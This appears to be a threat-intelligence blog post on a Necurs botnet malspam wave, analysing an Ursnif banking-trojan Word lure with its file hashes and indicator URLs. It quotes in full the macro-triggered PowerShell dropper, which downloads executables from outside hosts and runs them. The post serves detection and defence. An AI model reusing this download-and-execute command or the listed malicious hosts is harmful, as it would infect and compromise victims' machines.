Necurs Botnet & Banking Trojans

The Cisco Talos Team shared their analysis of the latest Malspam wave distributed by the Necurs Botnet (link).

Necurs is among the most active botnets globally, capable of generating massive volumes of spam. The malicious emails delivered by this campaign carry Ransomware and Banking Trojans — specifically Ursnif, Panda Banker, and Emotet.

Opening the malicious document and enabling its content (Macro execution) triggers the system compromise chain.

The following is a brief analysis of the Ursnif banking malware:

The malicious attachment is a .doc file named: [COMPANYNAME]_Request - [Employee Surname].doc

Opening the file and enabling content launches a PowerShell command with the following parameters:

$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=”));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + ‘\valabyhuh.exe’); Start-Process $env:APPDATA’\valabyhuh.exe’;Write-Host “bAbYgiramOpEPY”;$iARAPUmOPaJeS = New-Object System.Net.NetworkCredential(“lUpIaaKAXuqexOGybu”,”lUpIaaKAXuqexOGybu”).SecurePassword;(New-Object System.Net.WebClient).DownloadFile(‘http://91.210.104.247/porn.jpg’, $env:APPDATA + ‘\stat.exe’); Write-Host “FYFopIsYpUjurof”;Start-Process $env:APPDATA’\stat.exe’;$jOCOdeFOLUXALoNA = “nuqoLuSAwEjOdE”,”iiQOCOhERiJYsyie”,”qIhyGAtYlebimycuaUf”,”bYtURYGunUtiKe”,”pazuWeXOQoFIzIQUaUhe”;Exit;

The executed code initiates the download of two executable files:

• valabyhuh.exe
  • MD5:     fa37eb66b10eb030e777af9420ffce9a
  • SHA1:   92b86fcdb6bc0fcdbb60478e41456d5b565410ce
  • SHA256: 856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69

• stat.exe
  • MD5:     2ca1f87a624245db0a57bf439b71d460
  • SHA1:   2f6de1b66d8021b74ebcee0040b9a7c00b61d231
  • SHA256: 06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3

Network traffic generated:

Indicators of Compromise:

• http://91.210.104.247/emotet.txt (GrandSoft EK related)
• http://45.227.252.241/linnealva/kitea.dlm